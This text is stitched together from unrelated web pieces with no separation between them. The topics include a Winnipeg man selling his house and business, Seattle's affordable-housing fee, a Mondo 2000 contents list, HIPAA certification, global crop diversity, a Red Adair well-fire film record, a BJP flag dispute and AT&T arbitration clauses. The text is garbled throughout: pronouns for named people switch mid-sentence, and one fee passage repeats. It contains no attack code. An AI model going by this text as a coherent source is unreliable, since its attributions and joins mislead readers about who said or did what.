The 51-year-old Winnipeg native and owner of Gags Unlimited is selling almost everything they own: their fully furnished house, car, boat, RV, as well as their business, on the listing website Kijiji. He's doing this, they said, because they want a change in their life.
"I've always needed new experiences, and I've always needed new thrills, and I guess I'm a bit of a thrill-seeker, but I don't want to endanger my life doing it," they said.
After a heart attack a few years ago, Hogan said, they decided to take matters into their own hands. They looked into buying a hotel in Honduras, but the timing wasn't quite right. Their major problem, they said, was figuring out how to sell everything.
"It's like, what do I sell first? If I sell my house, what do I do with the stuff, and once the house sells, where will I live?... If I sell the house and the boat takes another month-and-a-half, then I'm still not prepared to go down and buy my dream, plus all the other stuff," they said.
The solution, they said, was to discount everything and sell it together so they could get rid of it all at once. While he's selling everything for $1.1 million, they said he's unsure of the actual value.
"I don't know, and I don't think I want to. It's all relative. I got pictures hanging on the wall that I might have paid 400 bucks for. What is it worth? Nobody is going to pay me 400, I don't think. But would they pay me two, or would they pay me 20 bucks? I don't know how to evaluate that," they said.
Their plan, they said, is to go to Mexico to buy a small bed-and-breakfast.
The only things they don't plan on selling are a few personal items: pictures, records, some clothes and their dog. Though the Yorkshire terrier is on sale in the listing, Hogan said the dog will either go with them or stay with their adult daughter. Everything else, people can buy.
"I don't really own too much. It's just stuff. I'd like to part with it. I'd want to know what it feels like not to own all of this and all the stuff that comes with it," they said.
"There are tools in the garage, they're yours."
Want to get a head start on your day? Get the day's breaking stories, weather forecast, and more sent straight to your inbox every morning.
The listing has got a lot of attention, with about 39,000 views since it went up Feb. 19. They said he's got few firm offers. A couple of people offered to buy parts of the listing, but they said he's only selling it as a package.
They said he's also been getting emails from people with cancer, stroke victims and others, encouraging them and telling them how their story made them rethink their lives.
"I had one email that said, 'You're a game-changer and you're going to do great.' "
Hogan said he's thankful for the attention and excitement, and still hopes somebody will take them up on their offer.
"People sit around waiting for something to happen. They wake up every morning and they go to a job they don't like, shovel snow in a house they can't afford. They just do it, day in, day out," they said. "I'm single, I live in a large house by myself, I go to bed at night alone, I wake up alone, and I'm sitting there: 'Wow, what am I waiting for?' "
oliver.sachgau@freepress.mb.ca
For more than a year, conversations have been ongoing about both the promise and pitfalls of Seattle's Housing Affordability and Livability Agenda (HALA) process. But in a significant moment at City Hall yesterday, advocates for housing affordability and development celebrated a major milestone when the Seattle City Council unanimously approved a Commercial Linkage Fee tied to all new commercial development. Adoption of the program represents the first legislative step in the HALA process, which seeks to increase development capacity and economic value while also providing commensurate social benefits through land value recapture programs like mandatory inclusionary housing.
Council Bill 118498, as it is known, codifies a new chapter in the land use code, that being Chapter 23.58B under the title of “Affordable Housing Impact Mitigation Program for Commercial.” And while the name is a bit clunky, the chapter is incredibly significant. The code gives developers three options in providing affordable housing: an onsite and offsite performance option, fee in lieu option, or combination of the two. The amount of affordable housing required is first determined by zone and then square footage of proposed commercial space1.
We previously covered how the Commercial Linkage Fee will work, but to recap:
The fee option ranges 2 from $8 to $17.50 per square foot for commercial zones located in Downtown and South Lake Union. Elsewhere in the city, fees range 3 from $5 to $10 per square foot.
from $8 to $17.50 per square foot for commercial zones located in Downtown and South Lake Union. Elsewhere in the city, fees range from $5 to $10 per square foot. The performance option works slightly different as a ratio of rentable affordable housing to chargeable commercial space. In Downtown and South Lake Union, the percentage of rentable affordable housing floor area required ranges2 from 5% to 10.6% of chargeable commercial floor area. Elsewhere in the city3, the ratio must be at least 5%. Additional strings come attached, including requirements that units are provided as rentals, be sized comparably to market-rate units, and have a rental cap at 60% of the area median income for 50 years.
Those numbers aren't entirely picked out of thin air; they're based upon a comprehensive study by David Paul Rosen & Associates to evaluate the economic impacts that commercial activity and jobs place on the local housing market. Their report recommended considerably higher impact fees in the range of $64 to $80 per square foot. Still, the fees are projected to rake in well over $195 million over the next decade for affordable housing.
The ordinance itself does not implement the Commercial Linkage Fee. As it is devised, the Commercial Linkage Fees will only become effective when formal changes to increasing zoning or development capacity in a targeted area directly refer back to the Commercial Linkage Fee ordinance (Chapter 23.58B), or are subject to certain contract rezones. South Lake Union and Downtown Seattle are the first likely locations where the would be instituted, and according to Councilmember Mike O'Brien, that's slated to happen in the first half of 2016. All new commercial development in those areas would then be required to provide affordable housing onsite or offsite, or through fee in lieu. Additional areas of the city will also be required to partake in the program, but the majority of those won't be subject to the Commercial Linkage Fee until sometime in 2017. That's because the requisite legislation for them won't be ready in 2016.
In the lead up to final vote, Councilmember Mike O'Brien offered an amendment to the bill to include a new section. The proposed section did not alter how the Commercial Linkage Fee works, but it did add a reference to a lengthy (15 pages!) attachment listing findings of fact. Those facts essentially explain how the Commercial Linkage Fee came to be, how it advances the goals of HALA, and how it is defensible under City and State law. Garnering full support of the Council, it was adopted to the amended bill. But before voting, Councilmembers took time to provide their thoughts on the bill.
Councilmember John Okamoto was first up to speak, and perhaps for one of the last times on the Council (he will retire later this month). They commended the City's effort to engage in progressive policy to deliver affordable housing and expressed great pride in their privilege to vote for it. They also reminded the Council that Seattle isn't the only place in the region that is adopting affordable housing policies. They pointed out that many other jurisdictions are implementing similar tools that serve as good examples.
The Council then turned their attention to Councilmember Kshama Sawant. While they expressed a clear desire to cast their vote in favor of the measure, Sawant felt that this legislation would not offer affordable housing soon enough and presented words of caution:
If we content ourselves with only demanding what big business agrees not to oppose, then we will not actually eliminate homelessness. We will never have enough affordable housing. And working people will never get out of the endless grind of living paycheck to paycheck. The goal has to be making housing affordable for all. The goal is not what big business is happy with.
Sawant suggested that developers should not simply be trusted to play kindly with the City through this process and pointed to the fight for a $15 minimum wage, where business sued the city over the law despite a similar grand bargain, as an example of bad faith. And they went on to reiterate that “we should not stop here” when it comes to affordable housing policies.
Councilmember Mike O'Brien wrapped up the conversation on the proposed bill by summarizing their excitement for it and the work yet to do:
This is a good and important step. That this alone will not do anything, there's a lot more work to do. And the work has to be much broader than just what we're talking about. It's great that we're almost there to take this step that will require all new development in our commercial and multi-family zones will be contributing toward providing affordable housing for the first time in the city's history. That is something to be really excited about. Yet, we heard today that the challenges around affordability, throughout the income spectrum, for folks that have experienced homelessness or currently experiencing homelessness, to folks that are going to school, to working full-time jobs. We're all struggling with how we manage to afford the city. And we need to do a lot of work around this and the other recommendations that came out of HALA.
The City Council approved the legislation on a 9-0 vote, and upon doing so was met with a standing ovation from the crowd gathered.
The Council also reaffirmed their commitment, in a unanimous vote, to moving full steam ahead on a host of remaining HALA legislative proposals. As adopted, Resolution 31612 establishes a breadth of key policies for consideration, including:
Establishment of a mandatory inclusionary housing program for residential development targeted for households at or below 60% of the area median income;
Additional development capacity through adjustments to the land use code;
Increased height limits and straight rezones of commercial and multi-family zoned property;
Rezoning up to 6% of single-family areas to multi-family residential or mixed-use zones;
Establishment of additional impact fees for transportation, parks, and childcare wherever increased development capacity is unlocked; and
Full implementation of Commercial Linkage Fees on new commercial development and mandatory inclusionary housing on mutli-family residential development when rezones have become effective.
The resolution sets a very robust timeline for policy proposals with full adoption anticipated by September 2017.
Footnotes
A series of exemptions are carved out for the first 4,000 square feet of ground-floor commercial space depending upon the development proposal and scope. No fee applies to the DH-1, C2-40, SM 85-240, SM 85/65-160, and PMM-85 zones. No fee applies to residential and industrial zones as well as the Yesler Terrace (MPC-YT) zone.
We hope you loved this article. If so, please consider supporting our work. The Urbanist is a non-profit that depends on donations from readers like you.
was a glossy
published in
during the 1980s and 1990s. It covered
topics such as
and
. It was a more anarchic and subversive prototype for the later-founded
magazine.
Content
Special Guest Editorial - William S. Burroughs
Our Readers Write
Congressional Bill would Suspend Constitution
Pushing the Rollercoaster Reality Envelope - Louis M. Brill
Fiber in the Valley - Denise Caruso
Street Tech - Gareth Branwyn
PXL 2000 - Brian Goldberg
Durk and Sandy Explain it all to You - St. Jude
The War on Drugs and FIJA - Robert Anton Walson
Flow like a Dragonfly, See like a Bee: a Drug-Free Expansion of the Senses - Nick Herbert
Do G-men Dream of Electric Sheep? - R. U. Sirius & George Gleason
Civilizing the Electronic Frontier: an interview with Mitch Kapor & John Barlow of the Electronic Frontier Foundation - David Gans & R. U. Sirius
Synergy Speaks: Goodbye Banks, Goodbye Telephones, Goodbye Welfare Checks - Michael Synergy
Freaked by Phrack: an interview with Craig Neidorf - John Perry Barlow
A Message to You From Legion of Doom Member "The Mentor"
On the Road to Chaos in East Berlin - Morgan Russell
The World's The Oldest Secret Conspiracy: Fronted by Steve Jackson Games, Inc. - Gareth Branwyn
Guess Work: an interview w/ Ausust Bequai - Gareth Branwyn
Phreaks R Us: an interview w/ Hacker Publishers Emmanuel Goldstein of 2600 & Rop Gonggrijp of Hack-Tic - R. U. Sirius & George Gleason
Deborah Harry: 21st Century Girl - Tresca Behling, R. U. Sirius & St. Jude
Dangerous Attire
Cybernetic Jewelery - Wearable Microsystems - Vernon Reed
Boom or Bust - Justine H
Jeff Designs - Bart Nagel
Hats by Pine - Bart Nagel
What Computers can for for the Fashion Designer - Willard Van de Bogart
Covert Design & Holographic Clothing: a look at the 21st Century Fashion - Mark Heley
Plastic People - R. U. Sirius & in conversation with Dr. Forshan
Future Food as conceived - Erez with Joshua Ets-Hokin
Shadow World of Heavy Metal Part 3 - Gracive & Zarkov
Frank Zappa for President
Escape from New York / Talking Hearts & Severed Heads: an interview with Tima Weymouth & Chris Franz - R. U. Sirius
Bitin' Off the Funk with George Clinton - Rickey Vincent
House Music: the Best Techno-Shamanic Cultural Virus so far - Mark Heley
Tune In, Turn on the Acid House with Psychic TV - Philip H. Farber with Djenaba
Muzak: the Concept of Manipulation through Music - Genesis P. Orridge
Deee-Lite: Like Tapping into the Soul of a Deep Program - St. Jude
The Primal Venting of Buttheads: a Post Punk Dialectic - Antonio Lopez
Butthole Hacker: We Talk to Gibby, Mostly about their Computer Graphics - Bart Nagel & R. U. Sirius
Taking Toys from the Boys: an interview with Rebecca Allen - Jas. Morgan
SIGGRAPH Gallery: the Wizards of Light & Motion Collected - Jas. Morgan & Christopher Case
Chaos & Catastrophe: an interview w/ Ralph Abraham - Rebecca McClen & David Jay Brown
Quantum Randiness: Mathematica Author Stephen Wolfram & Physics Genius Saul-Paul Sirag in conversation - Jas. Morgan & Efrem Lipkin assisted by John Zaitz, George Gleason & Jeff Mark
Drugs for Sex: Real Aphrodisiacs - Leila Mellow-Whipkit
A Word (or Two) on Aphrodisiacs from Dr. Ward Dean interviews - John Morgenthaler
Attitude: File Under "Bad" - John Shirley
Greatest Hist from Timothy Leary's Greatest Hists - R. U. Sirius
Holidays in Cambodia? - Richard P. Greenfield
MONDOzines - Mike Gunderlow
Sim City, A Cybernetic Playground
Cracking Mac Software for Fun and Profit: Words from an Expert
By Jason Wang / Published on January 4, 2014
The short answer is no one.
Unlike PCI, there is no one that can “certify” that an organization is HIPAA compliant. The Office for Civil Rights (OCR) from the Department of Health and Human Services (HHS) is the federal governing body here. And, HHS does not endorse or recognize the “certifications” made by private organizations.
There is an evaluation standard in the Security Rule § 164.308(a)(8), and it requires you to perform a periodic technical and non-technical evaluation to make sure that your security policies and procedures meet the security requirements. But, HHS doesn't care if the evaluation is performed internally or by an external organization.
Having said all that, being evaluated by an independent, third party auditor is still a really good idea. Even though it is not official you should still do it. There are a number of great companies that can help. For example, Coalfire Systems (http://www.coalfire.com) and ComplySmart (http://www.complysmart.com) offer HIPAA Assessments.
Important. Even if you get a “certification” from an external organization HHS can still come in and find a security violation. Third party audits and “certifications” do not absolve you from your legal obligations under the Security Rule.
It is interesting to note that Texas was the first state in the nation to create a formal Covered Entity Privacy and Security Certification Program. The program was developed as part of Texas' House Bill (HB) 300. The Texas Health Services Authority (THSA) and the Health Information Trust Alliance (HITRUST) have partnered to implement the Certification Program. They will tell you that the Texas state law protecting patients' health information is more stringent than HIPAA. So in theory, if you are certified by the THSA, then you are ipso facto HIPAA compliant. Don't hold me to that because HHS does not endorse or otherwise recognize this claim. But, considering the absence of a federal seal of approval this is a fantastic program and a step in the right direction.
If you have any questions about HIPAA compliance certification please talk to us today!
Having done a good bit of development with Android (some folks make scrapbooks on the weekend; I fight semicolons.), I've seen my fair share of Android's fragmentation issues. Though they're generally more annoying (a resolution quirk here, a touchscreen behavior oddity there) than they are insurmountable or deal-breaking, they're definitely not non-existent.
But don't take my word for it — I'm just a hobbyist. Baird Research polled 250 working developers (the dudes who do this for a living) on the matter, asking them straight up: “Do You View Android Fragmentation As A Problem?”
Turns out, the vast majority most of'em do.
The breakdown:
Overall, 87% (217) of the 250 developers view Android's fragmentation as some sort of problem, ranging from “Somewhat of a problem” to a “Huge Problem”.
Nearly 1/4 (24%, or 60) of the developers went as far as classifying it as a “Huge Problem”.
Only 14% (35) of the 250 developers don't consider it a problem at all.
Take it as you will. Commenters on the Internet are quick to unleash massive diatribes anytime dares mention Android's fragmentation issues — but when the people who do this stuff to put food on the table say there are issues, there are probably issues.
[Via Fortune]
A corn field in Godewaersvelde, northern France is pictured on Aug. 22, 2012 [AFP]
The world food supply has grown increasingly dependent on a shrinking list of crops, such as wheat and maize, in the past 50 years with major consequences for human nutrition and global food security, according to a new study.
The report from the International Centre for Tropical Agriculture (CIAT) in Colombia documents for the first time what experts have long suspected: over the last five decades, human diets around the world have grown more homogeneous and are showing no signs of slowing.
“More people are consuming more calories, protein and fat, and they rely increasingly on a short list of major food crops, like wheat, maize and soybean, along with meat and dairy products, for most of their food,” said lead author Colin Khoury, a scientist at CIAT, a member of the CGIAR consortium of research institutes. “These foods are critical for combating world hunger, but relying on a global diet of such limited diversity obligates us to bolster the nutritional quality of the major crops, as consumption of other nutritious grains and vegetables declines.”
The study, using data from the Food and Agriculture Organisation, encompassed more than 50 crops consumed in more than 150 countries (accounting for 98% of the world's population) between 1961 and 2009. It found that 50 crops made up the top 90% of calories, protein, fat around the world.
The report, published by Proceedings of the National Academy of Sciences in the US, suggests that a growing reliance on a few food crops may accelerate the worldwide rise in obesity, heart disease and diabetes, which are strongly affected by dietary change. The study's findings on obesity echo a January reportfrom the Overseas Development Institute (ODI), which said, on current trends, the world will see a huge increase in the number of people suffering certain types of cancer, diabetes, strokes and heart attacks, as more people in developing countries switch to diets rich in animal produce, fat, salt and sugar.
The CIAT study confirms that crops now predominant in diets around the world include several that were important 50 years ago – such as wheat, rice, maize and potato. But the emerging “standard global food supply” also consists of energy-dense foods that have become prominent more recently: soybean, sunflower oil and palm oil.
Wheat is a major staple in 97.4% of countries and rice in 90.8%, while soybean has become significant to 74.3% of countries. In contrast, many crops of regional importance – including cereals such as sorghum, millets and rye, and root crops such as sweet potato, cassava and yam – have lost ground.
Many other locally significant grain and vegetable crops – for which globally comparable data are not available – have suffered the same fate.
The loss of biodiversity poses risks, the CIAT study warns. A more homogeneous global food basket makes agriculture more vulnerable to drought, pests and diseases, which will be exacerbated by climate change, says Luigi Guarino, a co-author and senior scientist at the Global Crop Diversity Trust, in Germany.
“As the global population rises and the pressure increases on our global food system, so does our dependence on the global crops and production systems that feed us. The price of failure of any of these crops will become very high.”
The report throws up an interesting paradox. As the human diet has become less diverse at the global level over the past 50 years, many countries, particularly in Africa and Asia, have widened their menu of major staple crops, while changing to more globalised diets.
“In east and southeast Asia, several major foods – like wheat and potato – have gained importance alongside longstanding staples, like rice,” Khoury notes. “But this expansion of major staple foods has come at the expense of the many diverse minor foods that used to figure importantly in people's diets.”
The study attributes changes in global diet to a familiar list of reasons. Rising incomes in developing countries have allowed more consumers to include larger quantities of animal products, oils and sugars in their diets. Moreover, urbanisation has encouraged greater consumption of processed and fast foods. Related developments, including trade liberalisation, improved commodity transport, multinational food industries, and food safety standardisation have further reinforced these trends.
“Countries experiencing rapid dietary change are also quickly seeing rises in the associated diseases of overabundance,” says Khoury. “But hopeful trends are also apparent, as in northern Europe, where evidence suggests that consumers are tending to buy more cereals and vegetables and less meat, oil and sugar.”
The researchers single out five actions to foster diversity in food production and consumption to improve nutrition and food security:
• actively promote the adoption of a wider range of varieties of the major crops worldwide to reduce the vulnerability of the global food system to climate change, rising food demand, and increased water and land scarcity. This is especially important for certain crops, such as bananas, for which production is dominated by a very few, widely grown commercial varieties
• support the conservation and use of diverse plant genetic resources, including farmers' traditional varieties and wild species related to crops that are critical for broadening the genetic diversity of the major crops
• enhance the nutritional quality of major crops through crop breeding to improve the content of micronutrients like iron and zinc – and make supplementary vitamins and other nutrient sources more widely available
• promote alternative crops that can boost the resilience of farming. Key measures include identifying and conserving nutritious locally grown “neglected and underutilised” crops
• foster public awareness of the need for healthier diets, based on better decisions about what and how much we eat as well as the forms in which we consume food.
guardian.co.uk © Guardian News and Media 2014
Lin Manuel Miranda; Dwayne “The Rock” Johnson; Terry Crews; Fred Rogers
Taika Waititi: Powerfully creative, Knows himself, Good humored, Takes their work and their relationships with other people seriously, Intentional as a creator
John Mulaney: Publicly supportive of their wife and other women in their life, Crafts humor without taking cheap shots at people, Supportive friend, Willing to laugh at themselves yet confident
Andy Samberg: Uses platform and humor to publicly call out toxic masculinity and white privilege, Self-aware, Willing to cede the floor to others, Good friend
Will Smith: Very intentional about what type of actions they take as a husband and father (if you haven't watched them on The Red Table, you should), Good humored and professional, Dedicated to their craft putting in the hours and energy, Generous with their emotions and vulnerability, Responsive to others emotions and vulnerability
I read somewhere that one aspect of Toxic Masculinity is believing that being part of a “We” will erase the “I”; that selfhood is threatened by relationships with other people. It reads then that Healthy Masculinity (indeed, healthy people in general) create a “We” that enhances the “I”; that we can become more powerfully ourselves through relationships with other people.
All these men listed (and many more unlisted) live this type of energy, the one that builds connections without fear of losing the self - and in fact builds the self more with the building of connections.
Navigation SEARCH E bb 5016 Filter by: All American South Civil Rights & Social Justice Congressional & Political Energy & Natural Resources Archives of American Mathematics Military History Music News Media History Texas History Touring Entertainment UT Archives Western Americana Audio Video Browse Links
Devil's Cigarette Lighter [Composite]
Loading... Loading... Internet Explorer 9+
Firefox 3.5+
Safari 5+
Google Chrome 6+ Your browser does not support the latest Internet video standards. Please use one of the following supported browsers: Normal
Large video
Large content
Full video "rtmpconf":{ type:"flv", file:"rtmp://streaming.lib.utexas.edu/cah/mp4:bbailey/e_bb_5016.mp4", baseUrl:wgScriptPath + "/extensions/player/", streamServer:'streamserver.ufm.edu/vod', width:"480", height:"360", config:{ showBrowserControls:false }, poster:"/index.php?action=ajax%26rs=importImage%26rsargs[]=E bb 5016 preplay.jpg%26rsargs[]=480", controls:{ _timerStyle:"sides" } } Search Terms: Table of contents Opening credits Title card: Red Adair Co., Inc. Presents
Title card: The Devil's Cigarette Lighter
Title card: Narrated by Red Adair
Overview of work site and Gassi Touil (GT2) fire Aerial view of Hassi Messaoud campsite Close-up of GT2 fire Sign: Entree Interdite Danger De Mort
Debris from well explosion Drilling for water in the Albian Water Sand Derrick Lifting jackknife rig for first relief hole
Long shot of GT2 fire
Directional driller reading chart
Water drilling operation and worker accomodations Aerial view of well campsite Digging water pits and covering with polyethylene Camp entrance and safety precautions Sign: Controle Permanent Du Personnel [Button system for keeping track of workers] Coffin attached to helicopter Working area for assembling equipment Adair with Ed "Coots" Matthews Water cooled hook Filling water pits
Long shot of GT2 fire
Cooling GT2 site Aerial view of work site Workers assembling water monitor houses; Adair mentions that the nozzles are manufactured by Ohio's Akron Brass Company Caterpillar D8 tractors First monitor house moving in Worker opening valves to water pumps
View of GT2 well fire with reflection on water
Removing wreckage from pipeline explosion Worker Charlie Tolar Adair explains some of the hand signals used by the crew Removing derrick Relief hole Adair explains process of pumping mud into relief holes Removing mud tank Removing mud pump Sign: SGE 81 Boom with broken hook Main flow Boom with shield Cutting wreckage from drilling rig Adair details process of using cutting torch to break up wreckage
Night view of GT2 well fire with debris removed Workers in relief hole Adair acknowledges the presence of french workers and crews on blowout sites Cooling area around fire Adair details the proper weather for putting out fire
Using explosive charges to stop GT2 fire Preparing explosives Shot bucket Adair loading charges Adair describes headaches from glycerin and attempted remedies Charlie Tolar helping with main charge Adding Ansul Dry Chemical to the charge Wrapping charge in asbestos Adair, Boots, Coots, and Tolar setting charge Explosion; Fire put out Aftermath of explosion Adair directing workers Hook after explosion Gas rushing out of well head Leaking water hoses
Replacing wellhead and blowout preventer Removing damaged wellhead Clearing area around wellhead; Adair talks about precautions taken to avoid sparks or static electricity that could re-ignite a well fire Diagram: Damaged wellhead, with Adair detailing the wellhead replacement operation Digging out area below wellhead Drilling engineer for CEP [Compagnie D'exploration Pétrolière] with the last name Le Blanc Sawing conductor pipe with hacksaws Sawing off pipe head with sand line Adair explains why he's cutting off wellhead Cutting section of conductor pipe to expose casing Close-up of gas rushing out of pipe (Adair calls this "flow") Pipe cutter tool, with Adair detailing its design process, crediting Mark [sp?] and Associates, and Lecryder [sp?] Gear Adair and crew wearing goggles and working next to pipe Section of conducter pipe blowing off pipe Worker putting hand into gas flow; Adair comments, "Now this is a foolish stunt." Assembling new wellhead, with Adair detailing parts that were manufactured by Cameron Iron Works Close-up of damaged wellhead Hinge bolt Welding hinge bolt to Cameron AW-type 1500 series braden head Adair directing workers Installing new wellhead and blowout preventer Diagram: Cameron AW-type braden head Using boom to drop head onto pipeline Diagram: Cameron 900-series flange, slips, and packing element Safety engineer using Explosimeter gas detector Blowout preventer Two six-inch flow lines with two valves on each side, a Cameron manual valve and a Cameron Type F 1500 series blowout preventer Dropping blowout preventer into place Worker using Explosimeter
Bolting blowout preventer to wellhead Pulling blowout preventer into place Adair pulling rope connected to blowout preventer Workers attaching bolts in adverse conditions Charlie Tolar
Shutting off the gas flow to GT2 and finishing job Adair: "And this is what you waited six months to do." Adair and workers walking off job site John Korshe [sp?], who Adair describes as a "head man" for CEP [Compagnie D'exploration Pétrolière] and COPEFA [France-Africa Oil Company] Close-up of GT2 gas flow with blowout preventer and safety lock attached Long shots of gas flow Choke manifold Closing off valve, with gas flow coming to a stop Diagram: Cameron wellhead, spool, blowout preventer, valves and flow lines. Adair details how the equipment was installed and used Adair: "The irony of the whole thing is they don't want gas, so they'll cement this whole well up and just leave it." Aerial view of work site Long shot of fire burning in the night, panning to show reflection on work truck Pumping mud into GT2; CEP's [and COPEFA's?] mud-pumping set-up John Korshe [sp?] giving the order to fill the GT2 well with mud Adair on costs of job
End credits Title card: A Film Presentation By: Cameron Iron Works, Inc.
Title card: Under supervision of Boone & Cummings Advertising Agency
Mark Video Segment: begin end play & Share more... [Hide] Copy and paste this link to an email or instant message. [Hide] Right-click this link and add to bookmarks
GLIFOS-social media video Metadata Title: Devil's Cigarette Lighter [Composite] Identifier: e_bb_5016 Related: e_bb_5014 e_bb_5015 e_bb_5023 Description: Produced film documenting Paul "Red" Adair and company's infamous 1961-'62 fight with an gas well fire in the French Saharan desert-specifically, the Gassi Touil natural gas field in Algeria. Contains footage of the event with narration by Adair, giving an in-depth account of the processes and equipment used to stop the fire and contain the flow of gas. Diagrams of the replacement wellhead and blowout preventer (manufactured by Cameron Iron Works, Inc.) are also shown, with Adair detailing their functions. Adair points out appearances by crew members Asger "Boots" Hansen, Ed "Coots" Matthews, and former Houston Oilers fullback, Charlie Tolar, and also acknowledges John Korshe [sp?], who Adair describes as a "head man" for CEP [Compagnie D'exploration Pétrolière] and COPEFA [France-Africa Oil Company]. Composite version of sound and picture from related files, with color inverted. Country: Africa State: Algeria City: Gassi Touil Date: circa 1965 Creator Bailey, Bob Location: 77/1.1 Source: Bailey (Bob) Studios Photographic Archive Contributor: Adair, Red (narrator) Boone & Cummings Advertising Agency Red Adair, Co., Inc. Cameron Iron Works, Inc. Tolar, Charlie (worker) Language: en Publisher Dolph Briscoe Center for American History Rights: © Red Adair Co./Dolph Briscoe Center for American History Original Format: color negatives; sound tracks, 16mm
"I haven't heard that I'm not coming back," Weil coyly told us. "I just haven't officially signed on. I hope to be a part of it!"
While Weil said they are talking to the "core people first," they would "love to be a part of" the revival. Hey Amy Sherman-Palladino, that's your cue to call Weil STAT! To hear more from Weil about Gilmore Girls, press play on our interview with them above.
And when we chatted with Weil at the epic Gilmore Girls' reunion at the 2015 ATX TV Festival in June, they predicted what Paris would be up to now. "I like to think they and Doyle are very happily married, I think they were really matched, "Weil said of Paris and Doyle, Danny Strong's character. "I think Paris is probably still just in the world and doing work that interests them Maybe a little bit of law and a little bit of medicine."
HTGAWM airs Thursdays at 10 p.m. on ABC.
—Reporting by James Chairman
BANGALORE: BJP on Sunday asserted it will hoist the national flag at Lal Chowk in Srinagar on Republic Day despite the "suppressive methods" of the UPA and the Omar Adullah government in Jammu and Kashmir."...let me warn the government: You can suppress by various methods our agitation, but we will unfurl the flag at Srinagar on 26th January. That's definite," BJP spokesperson Prakash Javadekar told a press conference here.He said, "We know how to reach Jammu, how to reach Srinagar, if the government adopts suppressive methods. We will reach."On the halting the train in Maharashtra carrying BJP youth wing activists from Karnataka to Srinagar for the January 26 event, and sending them back to the state, they condemned and termed it "undemocratic", saying it's akin to emergency days of 1975.He said the activists had valid tickets till Jammu but still were not allowed to go. "Under what law?" they asked.On Prime Minister's statement that such "divisive programmes" (tiranga yatra) should not be held, Javadekar asked: "What is divisive in it?". The Prime Minister's statement suggests that it's "crime" to unfurl the national flag on Indian soil in Srinagar."(Kashmir) people are patriots. There are only a few separatists who oppose. Every year on 26th January and 15th August, separatists burn Indian flags and unfurl the Pakistan flag. That's more worrisome. That is anti-national. That's a real challenge to law and order," Javadekar said.He said, "But it seems that the government has surrendered to the separatists and that's why they allow Indian flags to be burnt. They allow Pakistani flags to be unfurled and that does not create law and order situation for Omar Abdullah . But hoisting an Indian flag on Indian soil is now being made to be a crime."
Want to build VR worlds but don't know your way around Unity or Unreal Engine? Voxelus may have the perfect solution for you.
For those that don't know, Voxelus consists of a set of tools that allow you to create VR environments and make games for them without needing any past knowledge of complicated areas like coding. In the past it required users to have a PC or Mac to actually edit and build these worlds, but today the developer behind the platform is adding in support for in-headset editing. That means you're now able to shape a pre-made world around you from within either the Oculus Rift or Gear VR.
The new feature is available through the Voxelus Viewer app (which we guess isn't technically just a viewer app anymore). Added to that app is a building menu that will enable you to place environmental blocks as well as edit maps with the help of other players. It's not quite the full world building feature, though the developer promises that this is also on its way in the near future.
The viewer itself is free, although certain assets are available for a price, while creators can also sell their worlds too via a marketplace. If you'd rather stick with content creation from scratch on PC, then the Voxelus Creator app is also still available. It allows you to build worlds and then populate them with assets like buildings and enemies. Once your environment has been created, you can explore it with friends online.
In-VR editing is a big step forward for the platform, and one that Voxelus no doubt hopes will be key to help to make it the dominant VR world building service out there. That said, it remains to be seen if Voxelus will be able to stand up to some stiff competition; both Unity and Unreal Engine are currently working on their own in-VR editors that simplify the development process and allow you to create environments in minutes. Will the new kid on the block be able to stand up to these giants?
Tagged with: gear vr, oculus rift, Voxelus, VR world building
Five Democratic US senators allege that AT&T's use of forced arbitration clauses has helped the company charge higher prices than the ones it advertises to customers.
The senators pointed to a CBS News investigation that described "more than 4,000 complaints against AT&T and [subsidiary] DirecTV related to deals, promotions and overcharging in the past two years." But customers have little recourse because they are forced to settle disputes with AT&T in arbitration, according to Sen. Al Franken (D-Minn.), Richard Blumenthal (D-Conn.), Ron Wyden (D-Ore.), Patrick Leahy (D-Vt.), and Edward Markey (D-Mass.).
"Forced arbitration provisions in telecommunications contracts erode Americans' ability to seek justice in the courts by forcing them into a privatized system that is inherently biased in favor of providers and which offers virtually no way to challenge a biased outcome," the senators wrote in a letter yesterday to AT&T CEO Randall Stephenson. "Forced arbitration requires consumers to sign away their constitutional right to hold providers accountable in court just to access modern-day essentials like mobile phone, Internet, and pay-TV services."
Forced arbitration provisions such as AT&T's also "include a class action waiver; language which strips consumers of the right to band together with other consumers to challenge a provider's widespread wrongdoing," they wrote.
When contacted by Ars today, AT&T argued that arbitration is better for consumers than courts of law.
“That tells me they're cheating people”
The CBS News story the senators referred to begins with the following passage:
Gary Raia signed up for an AT&T promotion—Internet and DirecTV for around a $100 a month for two years. When their first bill in July was nearly double that, they complained to AT&T. "Every month you open up your envelope and you go, 'OK, what's the surprise this month?'" "As I am talking to them, I get on the Internet and I look at the special," Raia told CBS News. "Their special is $99.99 and I say, 'can you just look at the Internet?'" Months later, they were still paying a lot more. "That tells me that they're cheating people," they said.
The senators said they are "particularly concerned about AT&T's treatment of customer complaints alleging that the company charged a higher rate for services than initially offered in a deal or promotion." The CBS News report found problems in AT&T's process for resolving customer complaints and that in the past two years, "only 18 out of AT&T's nearly 150 million subscribers sought accountability for these—or other—issues through individual, forced arbitration proceedings," the senators wrote.
The senators asked for details on how many complaints AT&T has received about breaches of deals, offers, and promotions in the past two years. They also want information on how many of those complaints were handled in an arbitration process, the average dollar amount of consumer claims, and data on what percentage of complaints "were heard by the same arbitration provider."
"What efforts are AT&T taking in response to the CBS News investigation to ensure that it is fully honoring its promotions and that customers receive consistent information from customer service representatives?" the senators asked. They requested a response by June 30.
Federal Communications Commission member Mignon Clyburn wants the FCC to limit pre-dispute arbitration clauses, but no such change is likely to happen under the commission's Republican leadership. Franken has authored Senate legislation that would ban mandatory arbitration clauses, but Congress is also controlled by Republicans.
Supreme Court ruling went AT&T's way
The terms of service for AT&T Internet and DirecTV require customers to "agree to arbitrate all disputes and claims" against AT&T. Class actions and trials by jury are prohibited, although individual cases in small claims courts are allowed. Even in arbitration, similar claims by multiple customers cannot be consolidated into a single case unless AT&T agrees to waive that requirement.
The AT&T Internet terms of service describe small claims court as "the exclusive alternative to arbitration." AT&T will pay for the arbitrator's fees when customers make claims for up to $25,000 (or $75,000 in the case of DirecTV), although customers can be forced to reimburse AT&T for those fees if the arbitrator finds the claim is frivolous.
AT&T and DirecTV customers are given 30 days to reject future changes to the arbitration provision, but there isn't any way to opt out of the arbitration/small claims provision altogether. By contrast, Comcast and other ISPs offer a method for opting out. AT&T confirmed to Ars that arbitration and small claims court are the only options for its customers.
The company did provide us with a general statement on its use of arbitration.
